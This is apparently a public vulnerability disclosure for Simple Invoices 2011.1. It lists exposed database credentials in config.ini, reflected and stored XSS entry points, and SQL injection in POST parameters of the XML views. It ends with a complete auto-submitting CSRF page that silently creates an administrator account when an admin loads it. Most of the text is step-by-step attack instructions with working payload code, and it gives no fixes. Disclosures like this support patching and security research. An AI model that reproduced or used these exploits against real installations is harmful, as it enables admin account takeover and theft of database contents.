Simple Invoices: http://www.simpleinvoices.org Version: 2011.1 - stable By Ross Marks: http://www.rossmarks.co.uk OSVDB Creditee: http://osvdb.org/creditees/13991-ross-marks 1. Information Disclosure visit: http://website.com/simpleinvoices/config/config.ini by default this is readable containing configuration information such as database details (host, port, username & password) 2. Reflected XSS visit: http://website.com/simpleinvoices/index.php?module=invoices&view=manage&having=<XSS> replace <XSS> with your payload (remember to escape javascript with ;</script> first) 3. Persistant XSS 3.1 visit: http://website.com/simpleinvoices/index.php?module=user&view=add create a user with a username of your payload, there is no filtering! 3.2 visit: http://website.com/simpleinvoices/index.php?module=customers&view=add create a user with a username of your payload, there is no filtering! 3.3 visit: http://website.com/simpleinvoices/index.php?module=billers&view=add create a user with a username of your payload, there is no filtering! 3.4 visit: http://website.com/simpleinvoices/index.php?module=invoices&view=itemised create invoice with name from 2.1, 2.2 or 2.3 3.5 visit: http://website.com/simpleinvoices/index.php?module=products&view=add create a product with a product name of your payload, there is no filtering! 3.6 visit: http://website.com/simpleinvoices/index.php?module=payment_types&view=add create a payment type with a description of your payload, there is no filtering! 3.7 visit: http://website.com/simpleinvoices/index.php?module=tax_rates&view=add create a tax rate with a description of your payload, there is no filtering! 3.8 visit: http://website.com/simpleinvoices/index.php?module=preferences&view=add create a invoice preference with a description of your payload, there is no filtering! 4. SQL Injection 4.1 visit: http://website.com/simpleinvoices/index.php?module=invoices&view=xml POST: page=1&rp=15&sortname=id&sortorder=desc&query=<SQLi>&qtype=c.name replace <SQLi> with your payload (also other POST variables are vulnerable) 4.2 visit: http://website.com/simpleinvoices/index.php?module=customers&view=xml POST: page=1&rp=25&sortname=name&sortorder=asc&query=<SQLi>&qtype=name replace <SQLi> with your payload (also other POST variables are vulnerable) 5. CSRF (create admin user) no protection against - get admin to visit page containing: <html><head></head><body> <!-- change these --> <form method='POST' action='http://website.com/simpleinvoices/index.php?module=user&view=add' > <input type="text" name="email" value="username_you_want" /> <input type="text" name="password_field" value="password_you_want" size="25" /> <!-- leave these --> <select name="role"><option value="1">administrator</option></select> <select name="enabled"><option label="Enabled" value="1" selected="selected">Enabled</option></select> <input type="hidden" name="op" value="insert_user" /> <button type="submit" class="positive" name="submit" value="Insert User"> </form> <script>document.forms[0].submit.click();</script> </body>